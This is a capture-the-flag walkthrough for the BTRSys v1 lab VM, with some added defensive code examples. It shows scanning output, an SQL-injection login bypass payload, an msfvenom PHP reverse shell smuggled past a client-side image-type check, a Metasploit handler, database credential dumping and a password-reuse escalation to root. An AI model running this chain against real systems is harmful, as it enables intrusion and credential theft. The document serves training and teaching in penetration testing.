BTRSys v1: CTF walkthrough


Name: BTRSys: v1

Date of release: 8 Jun 2017

Author: ismailonderkaya

Series: BTRSys

VM Link:,195/


We can find the IP address of the vulnerable system with arp-scan.


We scan the targeted system with nmap.

[email protected]:~/Desktop# nmap -p- -A -O -T5 --reason

Starting Nmap 7.60 ( ) at 2017-10-15 16:19 CEST
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for yoda.home (
Host is up, received arp-response (0.012s latency).
Not shown: 65377 closed ports, 155 filtered ports
Reason: 65377 resets and 155 no-responses
21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.2
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (EdDSA)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: BTRisk
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   12.07 ms yoda.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 244.95 seconds
[email protected]:~/Desktop#

Login Page

Oddly, gobuster didn’t find the login.php page, so I used nikto.

[email protected]:~/Desktop# nikto -host
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port:        80
+ Start Time:         2017-10-15 16:32:11 (GMT2)
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-10-15 16:33:38 (GMT2) (87 seconds)
+ 1 host(s) tested

The login.php page is a basic login page, but two client-side restrictions need to be bypassed.

<script type="text/javascript">

function control(){
    var user = document.getElementById("user").value;
    var pwd = document.getElementById("pwd").value;

    // everything after the last "@" in the username
    var str=user.substring(user.lastIndexOf("@")+1,user.length);

    if((pwd == "'")){
        alert("Hack Denemesi !!!");   // "Hack attempt !!!"
        return false;
    }
    else if (str!=""){   // the required domain string is not preserved in this copy
        alert("Yanlis Kullanici Bilgisi Denemektesiniz");   // "You are entering wrong user information"
        return false;
    }
    return true;
}
</script>


The username needs to contain the “” string, and we can’t use a single quote as the password (the check only rejects a password that is exactly a single quote). All of that sounds like a web form vulnerable to SQL injection. After a few tries, this payload worked for me: a' or 1=1;#
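As an added illustration (not part of the original walkthrough), here is the string-concatenation pattern that this payload exploits beside the parameterised query that defeats it, written in Python against an in-memory SQLite copy of the deneme.user table shown later in the walkthrough; the e-mail addresses and the function names are assumptions.

```python
import sqlite3

# Constructed seed rows modelled on the deneme.user table shown later in the
# walkthrough; the e-mail addresses are placeholders, not the VM's real ones.
SEED_ROWS = [
    (1, "ismail kaya", "ismail@btrsys.invalid", "asd123***"),
    (2, "can demir",   "can@btrsys.invalid",    "asd123***"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL database 'deneme'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (ID INTEGER, Ad_Soyad TEXT, "
                 "Kullanici_Adi TEXT, Parola TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?)", SEED_ROWS)
    return conn


def vulnerable_query(user, pwd):
    """The concatenation pattern the login bypass relies on. Returned as text
    (not executed) so the effect of the page's payload on the WHERE clause is
    visible: everything after the injected # becomes a MySQL comment."""
    return ("SELECT * FROM user WHERE Kullanici_Adi='" + user +
            "' AND Parola='" + pwd + "'")


def login_safe(conn, user, pwd):
    """Parameterised version: the driver sends the values separately from the
    SQL text, so quotes and comment markers in the input never alter the query.
    Parola is compared in clear text only to mirror the VM's table; a real
    application stores and checks a password hash. Returns the display name
    on success, None otherwise."""
    row = conn.execute(
        "SELECT Ad_Soyad FROM user WHERE Kullanici_Adi=? AND Parola=?",
        (user, pwd)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "a' or 1=1;#"
    print(vulnerable_query(payload, "x"))
    print(login_safe(db, payload, "x"))
    print(login_safe(db, "can@btrsys.invalid", "asd123***"))
```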

We now have access to a file upload form. I hope this input is sanitised.

From JPG to Reverse Shell

Once again, this input has only one restriction: we can only upload JPG, GIF or PNG files.

<script type="text/javascript">
        // accept=".jpg,.png"
function getFile(){
    var filename = document.getElementById("dosya").value;
    // text after the last "." (a regex match array, compared to a string by coercion)
    var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined);
    if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){
        return true;
    }
    alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz.");   // "You can only upload JPG,PNG files."
    return false;
}
</script>


The problem is that this check is done only on the client side. So, if we intercept the upload request with Burp Suite and change the file extension to .php, we can upload a PHP reverse shell.
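Here is an added server-side check (example code in Python, standing in for the VM's PHP back end) that would close the hole described above: the extension allow-list is re-applied on the server, the file content has to start with the magic bytes of the claimed image type, and the stored name is chosen by the server rather than the client. The function name and the size limit are assumptions.

```python
import os
import secrets

# Allow-list of extensions the form claims to accept, each with the leading
# bytes (magic numbers) a genuine file of that type starts with.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

MAX_SIZE = 2 * 1024 * 1024   # assumed limit; the VM sets none


def validate_upload(original_name, data):
    """Server-side replacement for the getFile() JavaScript check.
    Returns (accepted, reason, stored_name). stored_name is a random name
    chosen by the server, so a renamed 'rshell.php' never reaches disk under
    a name or extension the client picked. Save it in a directory where the
    web server does not execute scripts."""
    base = os.path.basename(original_name)          # drop any directory part
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in MAGIC:
        return False, "extension not allowed", None
    if len(data) > MAX_SIZE:
        return False, "file too large", None
    # A .jpg that starts with "<?php" is not a JPEG, whatever its name says.
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match extension", None
    stored = secrets.token_hex(16) + "." + ext
    return True, "ok", stored


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and a stand-in for the payload.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
    php = b"<?php /* constructed stand-in for the msfvenom output */ ?>"
    print(validate_upload("photo.png", png))
    print(validate_upload("rshell.jpg", php))
    print(validate_upload("rshell.php", php))
```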

We generate a PHP reverse shell called rshell.jpg with msfvenom.

[email protected]:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST= -o rshell.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
Saved as: rshell.jpg
[email protected]:~/Desktop#

We configure our Metasploit handler.

[email protected]:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > set LHOST
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 
msf exploit(handler) >

Finally, we configure Burp Suite to intercept the outgoing traffic, upload the rshell.jpg file, and change the extension of our reverse shell to .php in the intercepted request.

Change file extension

Now, we have a reverse shell.

Reverse shell

Privilege Escalation

First, we spawn a proper TTY with python.

meterpreter > shell
Process 3377 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/var/www/html/uploads$ export TERM=linux
export TERM=linux
[email protected]:/var/www/html/uploads$

Then we take a look at the interesting config.php file that nikto flagged earlier.

[email protected]:/var/www/html$ cat config.php
cat config.php
if (mysqli_connect_errno())
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();

[email protected]:/var/www/html$

Let’s use these MySQL credentials to explore the MySQL database deneme.

[email protected]:/var/www/html$ mysql -uroot -p -Ddeneme
mysql -uroot -p -Ddeneme
Enter password: toor

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 118197
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables;
show tables;
| Tables_in_deneme |
| user             |
1 row in set (0.00 sec)


Now, we will show the content of this table.

mysql> select * from user;
select * from user;
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
|  1 | ismail kaya | [email protected] | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | [email protected] | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
2 rows in set (0.00 sec)


Both users have the same password, so let’s try it for root.

mysql> quit
[email protected]:/var/www/html$ su root
su root
Password: asd123***

[email protected]:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/var/www/html#

We have root access to this system.

Root shell